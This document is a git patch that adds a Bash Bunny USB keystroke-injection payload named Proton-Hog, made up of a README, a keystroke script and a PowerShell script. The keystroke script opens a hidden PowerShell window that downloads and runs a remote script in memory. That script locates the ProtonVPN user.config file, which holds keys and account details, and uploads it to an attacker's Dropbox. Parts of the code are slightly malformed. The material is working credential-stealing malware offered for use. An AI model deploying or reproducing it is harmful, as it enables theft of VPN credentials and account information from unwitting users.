From 81b3dabbca40f24bea1588c1fdadf201815ef43e Mon Sep 17 00:00:00 2001
From: atomic <>
Date: Sun, 4 Dec 2022 21:53:18 -0500
Subject: [PATCH] Add files via upload
BashBunny/payloads/Proton-Hog/ | 108 ++++++++++++++++++++++
BashBunny/payloads/Proton-Hog/payload.txt | 16 ++++
BashBunny/payloads/Proton-Hog/s.ps1 | 41 ++++++++
3 files changed, 165 insertions(+)
create mode 100644 BashBunny/payloads/Proton-Hog/
create mode 100644 BashBunny/payloads/Proton-Hog/payload.txt
create mode 100644 BashBunny/payloads/Proton-Hog/s.ps1
diff --git a/BashBunny/payloads/Proton-Hog/ b/BashBunny/payloads/Proton-Hog/
new file mode 100644
index 0000000..6f2f2d1
--- /dev/null
+++ b/BashBunny/payloads/Proton-Hog/
@@ -0,0 +1,108 @@
+ Table of Contents
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+# Proton-Hog
+A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
+## Description
+This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file
+Then dropbox will be used to exfiltrate the files to cloud storage
+## Getting Started
+### Dependencies
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+(back to top)
+### Executing program
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+(back to top)
+## Contributing
+All contributors names will be listed here
+I am Jakoby
+(back to top)
+## Version History
+* 0.1
+ * Initial Release
+(back to top)
+## Contact
+📱 My Socials 📱
+ YouTube
+ |
+ Twitter
+ |
+ I-Am-Jakoby's Discord
+ |
+(back to top)
+(back to top)
+## Acknowledgments
+* [Hak5](
+* [I-Am-Jakoby](
+(back to top)
diff --git a/BashBunny/payloads/Proton-Hog/payload.txt b/BashBunny/payloads/Proton-Hog/payload.txt
new file mode 100644
index 0000000..602ef07
--- /dev/null
+++ b/BashBunny/payloads/Proton-Hog/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Proton-Hog
+REM Author: atomiczsec
+REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
+REM Target: Windows 10
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/BashBunny/payloads/Proton-Hog/s.ps1 b/BashBunny/payloads/Proton-Hog/s.ps1
new file mode 100644
index 0000000..ff568d7
--- /dev/null
+++ b/BashBunny/payloads/Proton-Hog/s.ps1
@@ -0,0 +1,41 @@
+function DropBox-Upload {
+ [CmdletBinding()]
+ param (
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("f")]
+ [string]$SourceFilePath
+ )
+ $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
+ $outputFile = Split-Path $SourceFilePath -leaf
+ $TargetFilePath="/$outputFile"
+ $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+ $authorization = "Bearer " + $DropBoxAccessToken
+ $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+ $headers.Add("Authorization", $authorization)
+ $headers.Add("Dropbox-API-Arg", $arg)
+ $headers.Add("Content-Type", 'application/octet-stream')
+ Invoke-RestMethod -Uri -Method Post -InFile $SourceFilePath -Headers $headers
+ }
+# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored
+if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
+ try {
+ Write-Host "The VPN folder has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+ }
+ else {
+$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
+cd $protonVpnPath
+Get-ChildItem | Where-Object {$ -Match "ProtonVPN.exe"} | cd
+Get-ChildItem | cd
+# Upload user.config to dropbox
+DropBox-Upload -f "user.config"
\ No newline at end of file